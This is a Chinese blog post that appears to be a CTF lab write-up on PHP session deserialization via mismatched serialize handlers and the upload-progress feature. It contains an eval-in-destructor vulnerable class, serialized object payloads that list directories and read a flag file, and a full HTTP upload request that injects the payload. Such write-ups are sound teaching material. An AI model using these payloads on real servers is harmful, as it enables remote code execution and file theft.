PHP反序列化与SESSION

最新推荐文章于 2024-07-26 17:57:56 发布

jack-yyj

最新推荐文章于 2024-07-26 17:57:56 发布

阅读量917

点赞数 2

分类专栏： CTF web安全文章标签： php 开发语言 web安全

本文链接：https://blog.csdn.net/yyj1781572/article/details/128189552

版权

web安全同时被 2 个专栏收录

15 篇文章 0 订阅

订阅专栏

CTF

5 篇文章 0 订阅

订阅专栏

php存储session的三种模式

php_serialize（php=>5.5.4）	经过serialize()函数序列化数组
php	键名+竖线+经过seralize()序列处理的值
php_biary	键名的长度对应ASCII字符+键名+serialize()序列化的值

测试代码

<?php

//ini_set("session.serialize_handler", "php");

//ini_set("session.serialize_handler", "php_serialize");

ini_set("session.serialize_handler", "php_binary");

session_start();

$_SESSION['moonsec'] = $_GET['moonsec'];

序列化存储格式

php

moonsec|s:3:"123";

php_serialize

a:1:{s:7:"moonsec";s:3:"123";}

php_binary

<0x07>moonsecs:3:"123";

2.CTF题目

<?php
ini_set('session.serialize_handler', 'php');
session_start();
class CTF
{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }
    function __destruct()
    {
        eval($this->mdzz);
    }
}
if(isset($_GET['phpinfo']))
{
    $m = new CTF();
}
else
{
    highlight_string(file_get_contents('index.php'));
}

?>

条件

session.serialize_handler php 局部变量 php_serialize 主变量
session.upload_progress.cleanup 默认开启现关闭
session.upload_progress.enabled 默认开启

php bug

PHP :: Doc Bug #71101 :: serialize_handler must not be switched for existing sessions

session.upload_progress.enabled On

session.upload_progress.enabled本身作用不大，是用来检测一个文件上传的进度。但当一个文件上传时，同时POST一个与php.ini中session.upload_progress.name同名的变量时（session.upload_progress.name的变量值默认为PHP_SESSION_UPLOAD_PROGRESS），PHP检测到这种同名请求会在$_SESSION中添加一条数据。由此来设置session

序列化

<?php
class CTF
{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'print_r(scandir(dirname(__FILE__)));';
    }
    function __destruct()
    {
        eval($this->mdzz);
    }
}

$m = new CTF();
echo serialize($m);
?>

O:3:"CTF":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}

上传表单

<html>       
<head>       
    <title>upload</title>   
</head>     
<body>      
<form action="http://www.test1.com/ctf/demo3/index.php" method="POST" enctype="multipart/form-data">    
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="1" />   
    <input type="file" name="file" />    
    <input type="submit" />     
</form>  
</body>  
</html>

|O:3:\"CTF\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}

读flag

O:3:"CTF":1:{s:4:"mdzz";s:83:"print_r(file_get_contents("D:/phpstudy_pro/WWW/www.test1.com/ctf/demo3/flag.php"));";

|O:3:\"CTF\":1:{s:4:\"mdzz\";s:83:\"print_r(file_get_contents(\"D:/phpstudy_pro/WWW/www.test1.com/ctf/demo3/flag.php\"));\";

POST /ctf/demo3/index.php HTTP/1.1

Host: www.test1.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------11171372103466141198728743662

Content-Length: 39314

Origin: http://www.test1.com

Connection: close

Referer: http://www.test1.com/ctf/demo3/upload.html

Cookie: PHPSESSID=p13eoiiiq3rp69k85an1d2idbu

Upgrade-Insecure-Requests: 1

-----------------------------11171372103466141198728743662

Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

-----------------------------11171372103466141198728743662

Content-Disposition: form-data; name="file"; filename="|O:3:\"CTF\":1:{s:4:\"mdzz\";s:83:\"print_r(file_get_contents(\"D:/phpstudy_pro/WWW/www.test1.com/ctf/demo3/flag.php\"));\";}

Content-Type: image/png